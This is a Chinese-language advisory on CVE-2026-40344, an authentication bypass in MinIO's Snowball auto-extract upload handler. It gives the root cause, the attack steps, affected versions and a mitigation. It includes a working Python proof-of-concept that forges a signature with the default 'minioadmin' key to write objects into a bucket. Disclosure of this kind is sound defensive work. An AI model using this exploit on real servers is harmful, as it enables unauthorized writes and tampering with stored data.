CVE-2026-40344 MinIO认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-40344

漏洞类型

认证绕过

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MinIO

漏洞概述

MinIO对象存储系统在受影响版本中存在一个认证绕过漏洞。该漏洞源于Snowball自动提取处理器（PutObjectExtractHandler）未正确处理`authTypeStreamingUnsignedTrailer`认证类型，导致签名校验逻辑被跳过。攻击者仅需知道一个有效的访问密钥（如默认的minioadmin），即可在无需秘密密钥或有效加密签名的情况下，向任意存储桶写入恶意对象。此漏洞影响所有受影响版本的MinIO部署。

技术细节

漏洞的根本原因是在添加`authTypeStreamingUnsignedTrailer`支持时，仅更新了`PutObjectHandler`和`PutObjectPartHandler`，而未在`PutObjectExtractHandler`的switch语句中添加对应的处理case。这导致当请求使用该认证类型时，程序执行穿透，跳过了签名验证步骤。虽然系统会在处理前通过`isPutActionAllowed`检查IAM权限，但这仅验证了Access Key的有效性，并未验证请求的完整性。攻击者可构造包含`X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER`和`X-Amz-Meta-Snowball-Auto-Extract: true`头部的PUT请求，并在Authorization头中使用Access Key配合伪造的签名。服务器接受请求后，会将请求体中的tar包自动提取并写入目标存储桶，实现任意文件写入。

攻击链分析

STEP 1

侦察

攻击者确定目标MinIO服务器，并获取一个有效的访问密钥（Access Key），尝试使用默认凭证minioadmin或利用其他泄露的凭证。

STEP 2

漏洞利用

攻击者构造特制的PUT请求，设置`X-Amz-Content-Sha256`为`STREAMING-UNSIGNED-PAYLOAD-TRAILER`，`X-Amz-Meta-Snowball-Auto-Extract`为`true`，并在Authorization头中仅包含有效的Access Key和伪造的签名。

STEP 3

认证绕过

MinIO服务器接收请求，由于`PutObjectExtractHandler`缺少对`authTypeStreamingUnsignedTrailer`的处理，系统跳过签名验证，仅检查Access Key的IAM权限。

STEP 4

写入恶意对象

请求验证通过，服务器将请求体中的tar包自动提取并写入到攻击者指定的存储桶路径中，实现任意文件写入。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-40344 PoC: MinIO Authentication Bypass
# Description: Exploits the missing signature verification for authTypeStreamingUnsignedTrailer.
# Requirements: A valid Access Key (e.g., 'minioadmin') and WRITE permission on a bucket.

target_url = "http://<target-minio-host>/<bucket-name>/test.tar"
access_key = "minioadmin"  # Replace with a valid access key

# Construct headers to bypass signature verification
headers = {
    "Authorization": f"AWS4-HMAC-SHA256 Credential={access_key}/20260422/us-east-1/s3/aws4_request, SignedHeaders=host;x-amz-content-sha256;x-amz-date, Signature=fabricated_signature_12345",
    "X-Amz-Content-Sha256": "STREAMING-UNSIGNED-PAYLOAD-TRAILER",
    "X-Amz-Meta-Snowball-Auto-Extract": "true",
    "X-Amz-Date": "20260422T120000Z",
    "Content-Type": "application/x-tar"
}

# Create a simple tar payload (replace with actual malicious file)
payload = b"fake_tar_content"

try:
    response = requests.put(target_url, headers=headers, data=payload)
    print(f"Status Code: {response.status_code}")
    if response.status_code == 200:
        print("[+] Exploit successful! Object uploaded without Secret Key.")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

MinIO >= RELEASE.2023-05-18T00-05-36Z

MinIO < RELEASE.2026-04-11T03-20-12Z

防御指南

临时缓解措施

如果无法立即升级，应在负载均衡器处配置规则，拒绝所有包含头部 `X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER` 的请求。此外，建议限制客户端使用签名变体（STREAMING-AWS4-HMAC-SHA256-PAYLOAD-TRAILER），并严格审查存储桶的写入权限，虽然这不能完全修复漏洞，但可以减少被攻击的风险。